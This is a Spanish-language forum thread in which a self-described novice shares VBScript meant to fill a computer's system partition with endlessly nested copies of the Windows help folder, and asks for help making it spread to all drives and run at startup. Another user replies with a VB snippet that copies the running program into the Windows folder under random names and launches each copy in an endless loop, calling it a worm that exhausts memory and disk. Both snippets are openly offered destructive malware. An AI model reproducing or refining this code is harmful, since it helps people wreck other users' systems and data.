Analisis de mi Malware

Iniciado por danny920825, 10 Octubre 2013, 14:18 PM

0 Miembros y 1 Visitante están viendo este tema.

danny920825

Hola a todos, soy nuevo en esto del malware, tan nuevo que este es mi primer intento despues de crear un bucle infinito en batch; ahora la cuestion es que ya tengo el codigo del malware, lo que quiero es hacerlo un virus,o sea, que se autocopie a todas las unidades de la pc y se ejecute al iniciar windows aun cuando el usuario que lo ejecute no pueda escribir en el registro. el diseño seria asi

on error resume next

' Declaracion de variables
set objshell = createobject("wscript.shell")
set objfso = createobject("scripting.filesystemobject")
dim perfil_usuario
dim carpeta_destino
dim cont
dim ampliar
dim help

rem                    Inicializacion de las variables
perfil_usuario = objshell.expandenvironmentstrings("%userprofile%")
help = objshell.expandenvironmentstrings("%windir%")
msgbox (help)
icono = objshell.expandenvironmentstrings("%windir%\system32")
carpeta_destino = objfso.createfolder(perfil_usuario & "\Dark_Stone")
llenar = objfso.createfolder(perfil_usuario & "\Dark_Stone\llenar")



rem                    Cuerpo
while (5=5)
copiar = objfso.copyfolder(help & "\help", llenar)
ampliar = objfso.createfolder(llenar & "\llenando")
llenar = ampliar
wend


lo del while (5=5) es una condicion que yo usaba en la escuela para decir que algo tenia que ejecutarse siempre sin final.
el objetivo de este codigo es llenar el espacio de la particion donde esta instalado el sistema operativo, lo que no logro hacer de ninguna forma y por eso no puse el codigo es que se copie. Por favor ayuda y espero haber ayudado a alguien con mi propuesta de codigo.

PD: Es valido tambien cualkier aporte al diseño y a la forma visual del malware!
"Los que reniegan de Dios es por desesperación de no encontrarlo".
   Miguel de Unamuno

Mad Antrax

La idea es buena, pero yo lo implementaría de alguna otra forma.

Usar un While (5=5) es válido, pero para iniciar un bucle infinito lo mejor es usar Do - Loop, por ejemplo:

Código (vb) [Seleccionar]

Randomize
Do
A = Environ("WINDIR") & "\" & int(Rnd * 99999) & ".exe"
FileCopy App.Path & "\" & App.EXEName & ".exe", A
DoEvents
Shell A

Loop


El ejemplo utiliza un bucle infinito, copia el virus en la carpeta del sistema con un número aleatorio y ejecuta dicha copia. Haciendo eso conseguirás ejecutar exponencialmente una misma copia del gusano, consumiendo los recursos de memoria y el espacio libre.

Mi código se puede mejorar, es solo un ejemplo :)
No hago hacks/cheats para juegos Online.
Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.

danny920825

tu respuesta me interesa utilizarla, pero necesito una descripcion de lo que hace, pues cuando sustituyo tu codigo por el mio y ejecuto el archivo, me abre un cartel msgbox que dice "c:windows", reviso el administrador de tareas y se esta ejecutando, pero no puedo monitorizarlo porque no se donde esta llenando el hdd. Por favor soy nuevo en esto, explicame si puedes. Gracias de antemano
"Los que reniegan de Dios es por desesperación de no encontrarlo".
   Miguel de Unamuno